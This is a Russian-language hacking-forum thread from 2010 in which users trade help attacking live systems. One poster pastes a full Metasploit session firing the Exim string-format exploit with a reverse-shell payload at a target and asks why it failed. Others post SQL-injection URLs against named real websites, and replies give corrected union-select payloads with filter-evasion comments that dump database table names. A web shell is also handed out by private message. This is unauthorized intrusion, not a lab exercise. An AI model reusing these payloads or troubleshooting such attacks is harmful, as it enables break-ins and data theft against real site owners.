ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

12.12.2010, 19:26
|
|
Guest
Сообщений: n/a
Провел на форуме: 1838
Репутация:
0
|
|
Сообщение от MikePro
MikePro said:
Подскажите пожалуйста как создать shell и как им пользоватся
Скинул ссылку на один шелл в пм. По теме: тебе необходимо его залить на удаленный сервер, а для этого ищи уязвимости.
|
|
|
|

12.12.2010, 21:10
|
|
Guest
Сообщений: n/a
Провел на форуме: 4212
Репутация:
0
|
|
Столкнулся со следующей проблемой. На сайте крутится Exim 4.69.
Вывод nmap:
25/tcp open smtp Exim smtpd 4.69
Пытаюсь использовать готовый эксплойт в Metsploit - http://www.metasploit.com/modules/exploit/unix/smtp/exim4_string_format
Вывод консоли:
msf > use unix/smtp/exim4_string_format
msf exploit(exim4_string_format) > set LHOST xxx
LHOST => xxx
msf exploit(exim4_string_format) > set RHOST yyy
RHOST => yyy
msf exploit(exim4_string_format) > set Payload generic/shell_reverse_tcp
Payload => generic/shell_reverse_tcp
msf exploit(exim4_string_format) > exploit
[-] Handler failed to bind to xxx:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Server: yyy ESMTP Exim 4.69 #1 Sun, 12 Dec 2010 11:00:32 -0600
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
[*] EHLO: yyy Hello xxx [xxx]
[*] EHLO: 250-SIZE 52428800
[*] EHLO: 250-PIPELINING
[*] EHLO: 250-AUTH PLAIN LOGIN
[*] EHLO: 250-STARTTLS
[*] EHLO: 250 HELP
[*] Determined our hostname is xxx and IP address is xxx
[*] MAIL: 250 OK
[*] RCPT: 550-xxx (xxx) [xxx] is currently
550-not permitted to relay through this server. Perhaps you have not logged
550-into the pop/imap server in the last 30 minutes or do not have SMTP
550 Authentication turned on in your email client.
[*] DATA: 503-All RCPT commands were rejected with this error:
503-xxx (xxx.com) [xxx] is currently
503-not permitted to relay through this server. Perhaps you have not logged
503-into the pop/imap server in the last 30 minutes or do not have SMTP
503-Authentication turned on in your email client.
503 Valid RCPT command must precede DATA
[*] Constructing initial headers ...
[*] Constructing HeaderX ...
[*] Constructing body ...
[*] Sending 50 megabytes of data...
[-] Exploit exception: Broken pipe
[*] Exploit completed, but no session was created.
Что это за Broken pipe такой? Кто-нибудь вообще пробовал этот сплойт?
На другом сервере выдает:
[*] MAIL: 250 OK
[*] RCPT: 550-"JunkMail rejected - xxx (xxx.com) 550-[xxx]:50524 is in an RBL, see 550 http://www.spamhaus.org/query/bl?ip=xxx"
[-] Exploit exception: end of file reached
[*] Exploit completed, but no session was created.
Тут я тоже ничего не понимю
|
|
|
|

12.12.2010, 21:19
|
|
Guest
Сообщений: n/a
Провел на форуме: 1838
Репутация:
0
|
|
Может порт 4444 защищен?
|
|
|
|

12.12.2010, 21:50
|
|
Guest
Сообщений: n/a
Провел на форуме: 4212
Репутация:
0
|
|
4444 порт биндится на моей машине и с ним все ок
|
|
|
|

12.12.2010, 22:22
|
|
Guest
Сообщений: n/a
Провел на форуме: 1838
Репутация:
0
|
|
"Handler failed to bind to xxx:4444" походу не забиндился порт
|
|
|
|

13.12.2010, 00:27
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме: 919131
Репутация:
74
|
|
http://www.alienzero.com/agent/resulttype.asp?probe='
Как ваще это крутить? Нашел по этой уязвимости http://1337db.com/exploits/15056
Подскажите плз.
|
|
|

13.12.2010, 00:42
|
|
Guest
Сообщений: n/a
Провел на форуме: 73674
Репутация:
16
|
|
Если верить вики, то Джет - это то же, что и Access, по идее так же должно и крутиться.
Мб стоит попробовать по этой статейке: /showthread.php?p=2193060 ?
З.Ы. Самому интересно.
|
|
|
|

13.12.2010, 01:31
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме: 111014
Репутация:
8
|
|
Не выводяться таблицы!
http://www.copelandfurniture.com/subcategory.php?id=-1+/*!UnIoN+SeLeCt*/+1,2,3,4,5,table_name,7,8,9+from+information_schem a.tables+--+
|
|
|

13.12.2010, 09:53
|
|
Guest
Сообщений: n/a
Провел на форуме: 31258
Репутация:
7
|
|
Сообщение от FlaktW
FlaktW said:
Не выводяться таблицы!
http://www.copelandfurniture.com/subcategory.php?id=-1+/*!UnIoN+SeLeCt*/+1,2,3,4,5,table_name,7,8,9+from+information_schem a.tables+--+
http://www.copelandfurniture.com/subcategory.php?id=-1+/*!union*/+select+1,2,3,4,5,/*!table_name*/,7,8,9+from+information_schema.tables+limit+0,1+--+
|
|
|
|

13.12.2010, 09:56
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
Сообщение от FlaktW
FlaktW said:
Не выводяться таблицы!
http://www.copelandfurniture.com/subcategory.php?id=-1+/*!UnIoN+SeLeCt*/+1,2,3,4,5,table_name,7,8,9+from+information_schem a.tables+--+
http://www.copelandfurniture.com/subcategory.php?id=-1+/*!UnIoN+SeLeCt*/+1,2,3,4,5,/*!unhex%28hex%28table_name%29%29*/,7,8,9+from+information_schema.tables+--+
часто вижу как ты выкладываешь сюда скули недокрученные, а подумать чуток? вот тебе таблы, без лимита все сразу
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|